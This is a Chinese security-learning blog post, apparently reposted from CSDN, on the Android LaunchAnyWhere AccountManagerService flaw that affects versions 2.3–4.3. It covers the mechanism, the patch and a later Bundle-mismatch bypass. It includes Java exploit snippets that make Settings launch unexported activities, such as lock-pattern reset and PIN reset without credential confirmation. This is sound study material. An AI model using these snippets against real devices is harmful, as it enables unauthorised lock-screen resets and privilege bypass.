安卓漏洞学习(一):launchAnyWhere: Activity组件权限绕过漏洞

已于 2024-10-08 11:32:24 修改
阅读量364 收藏 1
点赞数
分类专栏: 安卓安全 文章标签: 网络安全
于 2024-10-08 11:30:56 首次发布
原文链接:https://blog.youkuaiyun.com/stven_king/article/details/130259874
版权

漏洞概述

LaunchAnyWhere漏洞是一个AccountManagerService的漏洞,利用这个漏洞,我们可以任意调起任意未导出的Activity,突破进程间组件访问隔离的限制。这个漏洞影响2.3 ~ 4.3的安卓系统。

普通应用(记为AppA)去请求添加某类账户时,会调用AccountManager.addAccount,然后AccountManager会去查找提供账号的应用(记为AppB)的Authenticator类,调用Authenticator. addAccount方法;AppA再根据AppB返回的Intent去调起AppB的账户登录界面。

AccountManagerService同样也是系统服务之一,暴露给开发者的的接口是AccountManager。该服务用于管理用户各种网络账号。这使得一些应用可以获取用户网络账号的token,并且使用token调用一些网络服务。很多应用都提供了账号授权功能,比如微信、支付宝、邮件Google服务等等。

由于各家账户的登陆方法和token获取机制肯定存在差异,所以AccountManager的身份验证也被设计成可插件化的形式:由提供账号相关的应用去实现账号认证。提供账号的应用可以自己实现一套登陆UI,接收用户名和密码;请求自己的认证服务器返回一个token;将token缓存给AccountManager。可以从“设置-> 添加账户”中看到系统内可提供网络账户的应用。
如果应用想要出现在添加账户页面里,应用需要声明一个账户认证服务AuthenticationService:

    android:exported="true"
    android:enabled="true">
    <intent-filter>
        <action android:name="android.accounts.AccountAuthenticator" />
    </intent-filter>
    <meta-data
        android:name="android.accounts.AccountAuthenticator"
        android:resource="@xml/authenticator" />
</service>

并在服务中提供一个Binder

    private AuthenticationService.AccountAuthenticator mAuthenticator;
    private AuthenticationService.AccountAuthenticator getAuthenticator() {
        if (mAuthenticator == null)
            mAuthenticator = new AuthenticationService.AccountAuthenticator(this);
        return mAuthenticator;
    }
    @Override
    public void onCreate() {
        mAuthenticator = new AuthenticationService.AccountAuthenticator(this);
    }
    @Override
    public IBinder onBind(Intent intent) {
        Log.d("tanzhenxing33", "onBind");
        return getAuthenticator().getIBinder();
    }
    static class AccountAuthenticator extends AbstractAccountAuthenticator {
        /****部分代码省略****/
        @Override
        public Bundle addAccount(AccountAuthenticatorResponse response, String accountType, String authTokenType, String[] requiredFeatures, Bundle options) throws NetworkErrorException {
            Log.d("tanzhenxing33", "addAccount: ");
            return testBundle();
        }
    }
}

声明账号信息:authenticator.xml

<account-authenticator xmlns:android="http://schemas.android.com/apk/res/android"
    android:accountType="com.tzx.launchanywhere"
    android:icon="@drawable/ic_launcher"
    android:label="@string/app_name">
</account-authenticator>

漏洞原理

普通应用(记为AppA)去请求添加某类账户时,会调用AccountManager.addAccount,然后AccountManager会去查找提供账号的应用(记为AppB)的Authenticator类,调用Authenticator.addAccount方法;AppA再根据AppB返回的Intent去调起AppB的账户登录界面。
在这里插入图片描述
我们可以将这个流程转化为一个比较简单的事实:

  • AppA请求添加一个特定类型的网络账号
  • 系统查询到AppB可以提供一个该类型的网络账号服务,系统向AppB发起请求
  • AppB返回了一个intent给系统,系统把intent转发给appA
  • AccountManagerResponse在AppA的进程空间内调用 startActivity(intent)调起一个Activity;
    AccountManagerResponse是FrameWork中的代码, AppA对这一调用毫不知情。

这种设计的本意是,AccountManagerService帮助AppA查找到AppB账号登陆页面,并呼起这个登陆页面。而问题在于,AppB可以任意指定这个intent所指向的组件,AppA将在不知情的情况下由AccountManagerResponse调用起了一个Activity. 如果AppA是一个system权限应用,比如Settings,那么AppA能够调用起任意AppB指定的未导出Activity。

如何利用

如果假设AppA是Settings,AppB是攻击程序。那么只要能让Settings触发addAcount的操作,就能够让AppB launchAnyWhere。而问题是,怎么才能让Settings触发添加账户呢?如果从“设置->添加账户”的页面去触发,则需要用户手工点击才能触发,这样攻击的成功率将大大降低,因为一般用户是很少从这里添加账户的,用户往往习惯直接从应用本身登陆。
不过现在就放弃还太早,其实Settings早已经给我们留下触发接口。只要我们调用com.android.settings.accounts.AddAccountSettings,并给Intent带上特定的参数,即可让``Settings触发launchAnyWhere:

intent1.setComponent(new ComponentName("com.android.settings", "com.android.settings.accounts.AddAccountSettings"));
intent1.setAction(Intent.ACTION_RUN);
intent1.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
String authTypes[] = {"自己的账号类型"};
intent1.putExtra("account_types", authTypes);
AuthenticatorActivity.this.startActivity(intent1);

这个过程如图
在这里插入图片描述

应用场景

主要的攻击对象还是应用中未导出的Activity,特别是包含了一些intenExtra的Activity。下面只是举一些简单例子。这个漏洞的危害取决于你想攻击哪个Activity,还是有一定利用空间的。比如攻击很多app未导出的webview,结合FakeID或者JavascriptInterface这类的浏览器漏洞就能造成代码注入执行。

  • 重置pin码
intent.setAction(Intent.ACTION_RUN);
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
intent.putExtra("confirm_credentials",false);
final Bundle bundle = new Bundle();
bundle.putParcelable(AccountManager.KEY_INTENT, intent);
return bundle;

重置锁屏

intent.setComponent(new ComponentName("com.android.settings", "com.android.settings.ChooseLockPattern"));
intent.setAction(Intent.ACTION_RUN);
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
final Bundle bundle = new Bundle();
bundle.putParcelable(AccountManager.KEY_INTENT, intent);
return bundle;

漏洞修复

安卓4.4已经修复了这个漏洞,检查了Step3中返回的intent所指向的Activity和AppB是否是有相同签名的。避免了luanchAnyWhere的可能。
在这里插入图片描述

后续故事

这个补丁在当时是没什么问题,但是等到2017年,有海外的研究人员在一份恶意样本中发现,可以利用Parcelable反序列化绕过这个补丁,由于Google的补丁是在system_server中检查Intent,并且又通过AIDL传给Settings之后启动界面,这其中跨越了进程边界,也就涉及到一次序列化和反序列化的过程,那么我们如果通过Parcelable反序列化漏洞的字节错位,通过精确的布局,使得system_server在检查Intent时找不到这个Intent,而在错位后Settings却刚好可以找到,这样就可以实现补丁的绕过并再次实现LaunchAnyWhere,研究人员将发现的这种漏洞利用方式命名为Bundle mismatch。

原文链接:https://blog.youkuaiyun.com/stven_king/article/details/130259874

Android LaunchAnyWhere (Google Bug 7699048)漏洞详解及防御措施
简行之旅
08-22 1万+
开始 近日,Google修复组件安全的漏洞LaunchAnyWhere(Google Bug 7699048)。这个漏洞属于Intend Based提取漏洞,攻击者利用这个漏洞,可以突破了应用间的权限隔离,达到调用任意私有Activity(exported为false)的目的。 该漏洞影响Android 2.3至4.3固件。 漏洞分析 在分析这个漏洞之前,需要先介绍两个东西。 Acc
Android账户机制漏洞
JiaoMaGe的博客
11-11 507
Android账户机制漏洞 0x00前言 Android 2.0中加入了个新的包android.accounts,该包主要包括了集中式的账户管理API,用以安全地存储和访问认证的令牌和密码,比如,我们的手机存在多个账户,每个账户下面都有不同的信息,甚至每个账户都可以与不同的服务器之间进行数据同步(例如,手机账户中的联系人可以是个Gmail账户中的通讯录,可联网进行同步更新)。通俗地讲,就是An...
Android Hook 技术之 绕过系统对Activity验证
07-18
【SDK热更系列】Android Hook 技术之 绕过系统对Activity验证 , 原理详见个人博客https://blog.youkuaiyun.com/u012573920/
launchAnyWhere: Activity组件权限绕过漏洞解析(Google Bug 7699048 )
移动安全研究和Android/iOS/小程序隐私合规
09-02 1万+
作者:申迪      转载请注明出处    http://blogs.360.cn/360mobile/2014/08/19/launchanywhere-google-bug-7699048/前几天在试用gitx这个软件时偶然看到Google修复了漏洞,并记为Google Bug 7699048。这是个AccountManagerService的漏洞,利用这个漏洞,我们可以任意调起任意未导
Android LaunchAnywhere组件权限绕过漏洞
道阻且长,行则将至
05-29 3035
文章目录前言LaunchAnyWhereAccount 管理机制历史漏洞原理分析漏洞的利用与防御BroadcastAnywhere漏洞具体原理分析漏洞官方修复方案总结 前言 Android APP 应用的攻击面多数集中在对外暴露(exported="true”)的四大组件Activity、Service、ContentProvider、BroadcastReceiver)上,当组件设置 exported=“false” 或者是添加了权限保护的情况下,三方应用程序无法直接访问该组件,也就很难去借助该类组件
、四大组件Activity 组件
FUNY丶
02-26 1377
详解 Android 的 Activity 组件 Activity 的生命周期 和 J2ME 的 MIDlet 样,在 android 中,Activity 的生命周期交给系统统管理。与 MIDlet 不同的是安装在 android 中的所有的 Activity 都是平等的。 Activity 的状态及状态间的转换 在 android 中,Activity 拥有四种基本
launchAnyWhere: Activity组件权限绕过漏洞解析
stven_king的专栏
04-20 1284
1、通过了解漏洞原理,开发者可以更好地了解漏洞的产生机理,进而在应用开发过程中采取相应的安全措施,避免漏洞的产生,提高应用的安全性。2、学习漏洞原理可以帮助开发者更好地理解 Android 平台的工作原理,深入了解操作系统的内部机制,有助于开发高质量的应用程序。3、学习漏洞原理可以帮助开发者更好地理解代码的运行方式和效果,从而提高代码的可读性和可维护性。4、学习漏洞原理可以帮助开发者了解目前主流的安全防护技术,掌握安全防护的最佳实践,从而更好地保障应用程序的安全性。总之,了解和学习Android漏洞原理可以
Android FakeID任意代码注入执行漏洞简析.pdf
09-18
Android FakeID漏洞个严重的安全漏洞,它影响了Android系统的应用签名机制,允许恶意应用程序通过伪造证书进行代码注入并执行恶意操作。这漏洞由国外安全机构BlueBox于2014年7月30日公布,涉及到的受影响系统...
Android BroadcastAnyWhere(Google Bug 17356824)漏洞详细分析
简行之旅
11-18 8631
继上次Android的<a href="http://blog.youkuaiyun.com/l173864930/article/details/38755621">LaunchAnyWhere组件安全漏洞</a>后,最近Google在Android 5.0的源码上又修复了个高危漏洞,该漏洞简直是LaunchAnyWhere的姊妹版——BroadcastAnyWhere。通过这个漏洞,攻击者可以以system用户的身份发送广播,这意味着攻击者可以无视切的BroadcastReceiver组件访问限制。而且该漏洞
Android网络框架
08-06
在移动应用开发中,尤其是在Android平台上,网络通信是不可或缺的部分。它使得应用程序能够与服务器进行数据交换,实现各种功能,如获取新闻、上传图片、同步数据等。本文将深入探讨Android中的网络框架,以及如何...
移动安全学习笔记——组件安全之Activity组件漏洞挖掘
0nc3的博客
02-25 1986
0x00 简介 ACtivity组件不合理地导出,可能会产生以下安全风险: 越权绕过 信息泄露 钓鱼欺诈 拒绝服务 0x01 越权绕过漏洞 1、应用场景 在些业务场景中,某些界面包含敏感数据需要验证后才能查看,但是由于该敏感信息的Activity是导出的,无权限验证,则攻击者无需输入验证信息即可绕过权限查看敏感信息。 2、利用方法 (1)直接启动敏感界面 (2)通过启动主界面的子界面再返回,达到启动主界面效果 (3)通过设置本地密码的Activity,重置密码 3、防护 私有Activity,不
LaunchAnywhere载入Java VM时windows出现错误:2以及216
热门推荐
stereohomology
02-03 3万+
背景很久没碰到过类似问题了。都跟JavaVM有关。边解决边学。 英文版的错误提示: LaunchAnywhere Error: Windows error 2 occured while loading the Java VM 或 LaunchAnywhere Error: Windows error 216 occured while loading the Java
FastCV安装报错---LaunchAnyWhere错误:载入Java VM时Windows出现错误:2
weixin_30693683的博客
07-23 2786
解决方法:手动指定使用的java.exe即可 fastcv-installer-android-1-7-1.exeLAX_VM"C:\ProgramFiles\Java\jre1.8.0_60\bin\java.exe" 转载于:https://www.cnblogs.com/draenei/p/5699291.html...
关于FLAG_ACTIVITY_MULTIPLE_TASK
hg_lin的专栏
04-15 4763
FLAG_ACTIVITY_MULTIPLE_TASK 总结: 1、使用改标记,需要自行管理Activity 2、需要与FLAG_ACTIVITY_NEW_DOCUMENT或者FLAG_ACTIVITY_NEW_TASK共同使用 /** * This flag is used to create a new task and launch an activity into...
个app不同activity显示多任务(仿微信小程序切换效果)
zxz_zxz_zxz的博客
05-17 823
不会在任务列表创建新的窗口,依旧显示单个任务,设置此值会替代 FLAG_ACTIVITY_NEW_DOCUMENT 和 FLAG_ACTIVITY_MULTIPLE_TASK 标志的行为(如果在 Intent 中设置了其中个标志)。首先:经过测试,在manifest.xml中给要显示的activity设置android:lable,这种方法是可行的,但会相当于是固定了,不可变了。微信小程序会在其中显示两个单独的页面,点击跳跳会进入跳跳小程序,点击后面的微信,即会进入微信聊天主页面。
Android Intent FLAG标识
知我饭否
12-26 2692
最近,好些天都在看源码,现在 对这个Intent的FLAG有些总结。都是我自己试验的,总结的 ,可能有不对的地方,大家可以评论指出。 使用 对intent使用FLAG 大多数人都知道怎么弄。也就是调用public @NonNull Intent setFlags(@Flags int flags) 这个方法。但是如果 你同时要设定两个FLAG标识呢? 这个有两种方式可以解决。 第种: inte...
Android开发——Intent中的各种FLAG
WJ S的专栏
04-10 1万+
Android中发送Intent的时候有很多的标志位可以使用。是在做各种各样UI跳转时,熟悉这些标志的作用会给开发过程带来很大的遍历,这几天找时间把这些Flag都看了遍,顺便翻译了下,为便于理解,在翻译的时候也加了些说明性的东西,供自己以后参考用,顺便分享出来与大家学习讨论。 可能有些地方会有错误,欢迎大家指正,讨论。 原创翻译,如需转载,请标明出处。 http://blog.cs
单线复用有线mesh组网
05-03
单线复用和有线mesh组网都是用于构建计算机网络的方法,但它们有些不同之处。 单线复用是种用于在单个物理链路上传输多个数据流的技术。这意味着通过条物理链路传输多个信号,每个信号都经过特殊处理,以便在物理层上互不干扰。这种技术可以减少网络建设成本,提高网络带宽利用率。 有线mesh组网是种用于构建大规模有线网络的方法。在这种网络中,每个设备都与多个其他设备直接连接。这些连接形成了个网状结构,其中每个设备都可以通过多个路径进行通信。这种结构可以提高网络的可靠性和鲁棒性,因为即使某些连接中断,数据仍然可以通过其他路径传输。 总的来说,单线复用和有线mesh组网都是有用的构建网络的方法,但它们适用于不同的场景。单线复用适用于小规模网络,而有线mesh组网适用于大规模网络。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值